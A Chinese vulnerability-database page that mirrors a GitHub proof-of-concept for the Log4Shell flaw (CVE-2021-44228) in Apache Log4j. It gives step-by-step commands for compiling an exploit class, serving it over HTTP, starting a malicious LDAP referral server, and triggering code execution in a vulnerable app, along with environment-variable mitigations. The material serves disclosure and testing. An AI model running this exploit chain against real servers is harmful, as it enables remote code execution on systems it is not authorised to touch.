漏洞平台

POC详情： 9f6d5c9e713d08c9574cd5c1564d9d0664a14780

来源

https://github.com/sunnyvale-it/CVE-2021-44228-PoC

关联漏洞

标题： Apache Log4j 代码问题漏洞 (CVE-2021-44228)
描述：Apache Log4j是美国阿帕奇（Apache）基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞，攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器，当该请求被打印成日志时就会触发远程代码执行。

描述

CVE-2021-44228 (Log4Shell) Proof of Concept

介绍

# CVE-2021-44228 (Log4Shell) Proof of Concept

![](img/0.gif)

Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.
An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

To help customers understand how this flaw works, we prepared this repo with a simple yet working Proof of Concept.

## Prerequisites

Having installed locally:

- Git
- JDK 11
- Maven
- Python

At the moment, the arbitrary code launches the Calculator application on macOS or Windows, so only those two operating systems are supported by this PoC.

## Disclaimer

All informations and code are provided solely for educational purposes and/or testing your own systems for this vulnerability.

## The attack tecnique

This PoC resemble the described in the picture below (credits [GovCERT.ch](https://GovCERT.ch)), a part from the vulnerable server that is just a simple Java class for the sake of simplicity. It's important to understand that this vulnerability may be triggered in various ways, what is described below is just one of them.

![](img/1.jpeg)

## How to run the PoC

Clone this repo

```console
terminal1 $ git clone https://github.com/sunnyvale-it/CVE-2021-44228-PoC.git
```

Compile the exploit (using JDK 11)

```console
terminal1 $ javac Exploit.java
```

Run an HTTP server to serve the exploit

```console
terminal1 $ python -m SimpleHTTPServer 8888 --directory .
```

Start the malicious LDAPRefServer (thanks to https://github.com/mbechler/marshalsec)

```console
terminal2 $ java -cp tools/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"
```

Launch the buggy application (containing log4j 2.14.1)

```console
terminal3 $ mvn package && mvn exec:exec
```

If everything went fine, the Calculator application (arbitrary code execution) should pop-up

![](img/3.png)

## Quick mitigations (work on Log4J versions 2.10.0 up to 2.14.1)

### Set the LOG4J_FORMAT_MSG_NO_LOOKUPS env variable to true

```console
terminal3 $ export LOG4J_FORMAT_MSG_NO_LOOKUPS=true 
```

```console
terminal3 $ mvn package && mvn exec:exec
```

In this case the Calculator shouldn't pop-up anymore

### Run the application with log4j2.formatMsgNoLookups System property set to true

```console
terminal3 $ mvn package && mvn exec:exec -Dlog4j2.formatMsgNoLookups=true
```
In this case the Calculator shouldn't pop-up anymore

文件快照


 [4.0K]  /data/pocs/9f6d5c9e713d08c9574cd5c1564d9d0664a14780
├── [ 581]  Exploit.java
├── [4.0K]  img
│   ├── [4.7K]  0.gif
│   ├── [102K]  1.jpeg
│   └── [536K]  3.png
├── [1.8K]  pom.xml
├── [2.5K]  README.md
├── [4.0K]  src
│   └── [4.0K]  main
│       └── [4.0K]  java
│           └── [ 327]  Main.java
└── [4.0K]  tools
    └── [ 41M]  marshalsec-0.0.3-SNAPSHOT-all.jar

5 directories, 8 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。